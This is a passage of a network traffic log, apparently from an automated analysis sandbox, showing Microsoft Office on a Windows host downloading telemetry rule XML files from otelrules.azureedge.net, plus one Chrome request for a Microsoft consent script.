                                                                                x-azure-ref: 20241004T093405Z-15767c5fc55gq5fmm10nm5qqr80000000ccg000000007utx
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                 2024-10-04 09:34:05 UTC | 419 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                 77 | 192.168.2.5 | 55475 | 13.107.246.60 | 443
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 2024-10-04 09:34:05 UTC | 192 | OUT | GET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                 2024-10-04 09:34:05 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:05 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 472
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                ETag: "0x8DC582B984BF177"
                                                                                x-ms-request-id: dcc4dd0d-f01e-0099-7c8c-159171000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093405Z-15767c5fc5546rn6ch9zv310e00000000590000000006wgm
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                 2024-10-04 09:34:05 UTC | 472 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                 78 | 192.168.2.5 | 55478 | 13.107.246.60 | 443
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 2024-10-04 09:34:05 UTC | 192 | OUT | GET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                 2024-10-04 09:34:05 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:05 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 468
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                ETag: "0x8DC582BBA642BF4"
                                                                                x-ms-request-id: 4a2177bf-401e-00a3-638c-158b09000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093405Z-15767c5fc55sdcjq8ksxt4n9mc00000001qg00000000419t
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                 2024-10-04 09:34:05 UTC | 468 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                 79 | 192.168.2.5 | 55477 | 13.107.246.60 | 443
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 2024-10-04 09:34:05 UTC | 192 | OUT | GET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                 2024-10-04 09:34:05 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:05 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 405
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                ETag: "0x8DC582B942B6AFF"
                                                                                x-ms-request-id: d59d44fd-601e-003e-698c-153248000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093405Z-15767c5fc55fdfx81a30vtr1fw0000000ckg000000009uet
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                 2024-10-04 09:34:05 UTC | 405 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                 80 | 192.168.2.5 | 55481 | 13.107.246.60 | 443
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 2024-10-04 09:34:06 UTC | 192 | OUT | GET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                 2024-10-04 09:34:06 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:06 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 174
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                ETag: "0x8DC582B91D80E15"
                                                                                x-ms-request-id: 4da5cae8-a01e-0070-0e8c-15573b000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093406Z-15767c5fc55ncqdn59ub6rndq00000000c0g000000005a7s
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                 2024-10-04 09:34:06 UTC | 174 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                 81 | 192.168.2.5 | 55482 | 13.107.246.60 | 443
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 2024-10-04 09:34:06 UTC | 192 | OUT | GET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                 2024-10-04 09:34:06 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:06 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1952
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                ETag: "0x8DC582B956B0F3D"
                                                                                x-ms-request-id: 1cc30b66-e01e-0071-368c-1508e7000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093406Z-15767c5fc554wklc0x4mc5pq0w0000000cr0000000003dzx
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:06 UTC | 1952 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                82 | 192.168.2.5 | 55483 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:06 UTC | 192 | OUT | GET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:06 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:06 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 958
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                ETag: "0x8DC582BA0A31B3B"
                                                                                x-ms-request-id: 8e9c9a52-201e-000c-6b8c-1579c4000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093406Z-15767c5fc554w2fgapsyvy8ua00000000bx0000000002rt0
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:06 UTC | 958 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                83 | 192.168.2.5 | 55484 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:06 UTC | 192 | OUT | GET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:06 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:06 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 501
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                ETag: "0x8DC582BACFDAACD"
                                                                                x-ms-request-id: 0da9586c-701e-0097-318c-15b8c1000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093406Z-15767c5fc55852fxfeh7csa2dn0000000c9g0000000036nv
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:06 UTC | 501 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                84 | 192.168.2.5 | 55485 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:06 UTC | 193 | OUT | GET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:06 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:06 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 2592
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                ETag: "0x8DC582BB5B890DB"
                                                                                x-ms-request-id: b9a19cb7-401e-0078-068c-154d34000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093406Z-15767c5fc554l9xf959gp9cb1s00000006gg000000004te4
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:06 UTC | 2592 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                85 | 192.168.2.5 | 55491 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:07 UTC | 192 | OUT | GET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:07 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:07 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 3342
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                ETag: "0x8DC582B927E47E9"
                                                                                x-ms-request-id: 1cc30bd5-e01e-0071-1a8c-1508e7000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093407Z-15767c5fc55qdcd62bsn50hd6s0000000c3g000000006ydb
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:07 UTC | 3342 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                86 | 192.168.2.5 | 55494 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:07 UTC | 192 | OUT | GET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:07 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:07 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1393
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                ETag: "0x8DC582BE3E55B6E"
                                                                                x-ms-request-id: b23951fc-501e-005b-2a8c-15d7f7000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093407Z-15767c5fc55tsfp92w7yna557w0000000cd0000000002gz8
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:07 UTC | 1393 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                87 | 192.168.2.5 | 55492 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:07 UTC | 193 | OUT | GET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:07 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:07 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 2284
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                ETag: "0x8DC582BCD58BEEE"
                                                                                x-ms-request-id: 82f8c3b9-c01e-0014-418c-15a6a3000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093407Z-15767c5fc55whfstvfw43u8fp40000000cgg000000003k75
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:07 UTC | 2284 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                88 | 192.168.2.5 | 55495 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:07 UTC | 192 | OUT | GET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:07 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:07 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1356
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                ETag: "0x8DC582BDC681E17"
                                                                                x-ms-request-id: b9a19e00-401e-0078-388c-154d34000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093407Z-15767c5fc55n4msds84xh4z67w000000064g000000000cgd
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:07 UTC | 1356 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                89 | 192.168.2.5 | 55496 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:07 UTC | 192 | OUT | GET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:07 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:07 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1393
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                ETag: "0x8DC582BE39DFC9B"
                                                                                x-ms-request-id: 7afec079-601e-000d-468c-152618000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093407Z-15767c5fc552g4w83buhsr3htc0000000c90000000008whx
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:07 UTC | 1393 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                90 | 192.168.2.5 | 55497 | 13.107.246.45 | 443 | 6020 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:07 UTC | 390 | OUT | GET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                Host: wcpstatic.microsoft.com
                                                                                Connection: keep-alive
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                Accept: */*
                                                                                Sec-Fetch-Site: none
                                                                                Sec-Fetch-Mode: cors
                                                                                Sec-Fetch-Dest: empty
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Cookie: MSCC=NR
                                                                                2024-10-04 09:34:07 UTC | 712 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:07 GMT
                                                                                Content-Type: application/javascript
                                                                                Content-Length: 52717
                                                                                Connection: close
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                Age: 8913
                                                                                Cache-Control: max-age=43200
                                                                                Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                Etag: 0x8DA85F6F74C6D08
                                                                                Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                Vary: Accept-Encoding
                                                                                X-Cache: CONFIG_NOCACHE
                                                                                x-ms-blob-type: BlockBlob
                                                                                x-ms-lease-status: unlocked
                                                                                x-ms-request-id: c6f3427e-201e-0014-712b-1668f5000000
                                                                                x-ms-version: 2009-09-19
                                                                                x-azure-ref: 20241004T093407Z-15767c5fc55v7j95gq2uzq37a00000000cpg000000000p30
                                                                                Accept-Ranges: bytes


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                91 | 192.168.2.5 | 55500 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:07 UTC | 192 | OUT | GET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:07 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:07 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1395
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                ETag: "0x8DC582BE017CAD3"
                                                                                x-ms-request-id: a68e09c4-f01e-0052-148c-159224000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093407Z-15767c5fc55d6fcl6x6bw8cpdc0000000c3g00000000bnh6
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:07 UTC | 1395 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                92 | 192.168.2.5 | 55499 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:07 UTC | 192 | OUT | GET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:07 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:07 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1356
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                ETag: "0x8DC582BDF66E42D"
                                                                                x-ms-request-id: 3ef81e2a-f01e-001f-3f8c-155dc8000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093407Z-15767c5fc55qkvj6n60pxm9mbw00000001gg000000004v93
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:07 UTC | 1356 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                93 | 192.168.2.5 | 55501 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:07 UTC | 192 | OUT | GET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:07 UTC | 563 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:07 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1358
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                ETag: "0x8DC582BE6431446"
                                                                                x-ms-request-id: 6a90313a-301e-005d-1a8c-15e448000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093407Z-15767c5fc55ncqdn59ub6rndq00000000bz00000000077um
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:07 UTC | 1358 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                94 | 192.168.2.5 | 55502 | 13.107.246.60 | 443 | 6020 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
